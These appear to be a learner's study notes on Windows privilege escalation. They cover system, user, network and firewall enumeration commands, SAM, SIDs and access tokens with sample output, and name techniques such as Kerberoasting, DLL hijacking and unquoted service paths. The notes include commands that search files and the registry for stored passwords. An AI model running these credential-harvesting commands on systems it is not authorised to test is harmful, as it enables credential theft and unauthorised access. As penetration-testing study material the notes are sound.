Privilege escalation

• bypass authentication
• exploit authentication

Systeminfo

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

HOTFIX

wmic qfe

Drive Enumeration

wmic logicaldisk get caption

Process enumeration

tasklist 

User and Group Enumeration

whoami
whoami /groups
net user
net user Administrator
net localgroup administrators # who are admins?

Network enumeration

ipconfig /all
route print
netstat -ano

Password Enumeration

Goal: Find passwords that are

• Locally stored
• stored in windows registry
• SAM database

findstr /si password *.doc *.txt *.ini *.config
dir /s *pass* == *cred* == *ssh* == *.config*
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions\kali"

Firewall enumeration

sc query windefend
sc queryex type=service
netsh firewall show state

Protection ring

Kernel | Ring 0 | Ring 1 | Ring 2 | Ring 3 |

Attack type

• Horizontal
• Vertical -> gain root/administrator access

Windows

Windwows has user centered design (UCD)

Windows Authentication

• Windows authentication is handled by Windows Logon (Winlogon) process and Security Account Manager (SAM)
• SAM is a really local database used to store user accounts in Windows
• C:\windows\system32\config\SAM
• Via registry: HKEY_LOCAL_MACHINE\SAM
• You can't view SAM when system is booted
• Modern windows versions uses NTLM2 (New Technology Lan Manager)

Authentication method

• NTLM
• Kerberos

User Identification

• User identification is done via security identifier (SID)
• https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-identifiers
• https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-azod/ecc7dfba-77e1-4e03-ab99-114b349c7164

Enumerate SID

wmic useraccount get name,sid
C:\Users\student>wmic useraccount get name,sid
Name                SID
Administrator       S-1-5-21-4220604249-1900369337-2551126576-500
DefaultAccount      S-1-5-21-4220604249-1900369337-2551126576-503
Guest               S-1-5-21-4220604249-1900369337-2551126576-501
student             S-1-5-21-4220604249-1900369337-2551126576-1001
WDAGUtilityAccount  S-1-5-21-4220604249-1900369337-2551126576-504

Access Token

• An object that can be used to identify the security context of a process or a thread on a system
• Generated by the WINLOGON process
• Access token contains identity and privilege of the user
• Token is added to the userinit.exe process and then copied to all child processes

Access token ma
    User SID, Group SID, ogon SID
    Privileges assigned to the user or the user's group
    Discretionary access control list (DACL)

To get a list of access token:

whoami /priv on regular and admin mode

C:\Users\student>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Disabled
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
SeCreatePagefilePrivilege       Create a pagefile                         Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Disabled
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
SeTimeZonePrivilege             Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled

Common Windows Vulnerabilities

• Missing security patches
• kernel exploits
• service vulnerability
• misconfigurations
• weak / default credentials

Cpassword - within a DC, there is a group policy preference attribute that contains password

• this is stored as an encrypted xml

LDAP

• Credentials are stored in clear text

Keberoasting

• Domain users can query Kerberos ticket for other users

LSASS - Local Security Authority Sybsystem Service

Unattended installation

• PXE stores some credentials for proper software installation

SAM database (Security Account Manager)

• Database that contain user password - mostly local machine

DLL hijacking (Dynamic Link Library)

• One DLL may load another malicious DLL in memory

Unquoted service paths

Kernel Exploits

• Ring 0 - Kernel - core of an operating system
• Kernel runs on system memory JOB:
• Memory management
• Device Management
• I/O Management
• Resource Management

Windows NT

• this the kernel comes with all versions of MS windows
• Contains two modes - User Mode and Kernel Mode

NET Utility

https://en.wikiversity.org/wiki/Net_(command)/User https://steflan-security.com/windows-privilege-escalation-credential-harvesting/

SETHC utility

• https://www.processlibrary.com/en/directory/files/sethc/28697/
• How to stop SETHC attack? https://superuser.com/questions/732605/how-to-prevent-the-sethc-exe-hack

WMIC Command line

• https://www.windows-commandline.com/wmic-useraccounts/
• https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic

HIDE Username from windows login screen

• https://www.raymond.cc/blog/hide-user-accounts-from-the-windows-xp-welcome-screen/

Linux

• Exploit SUDO
• Exploit SUID
• Insecure credentials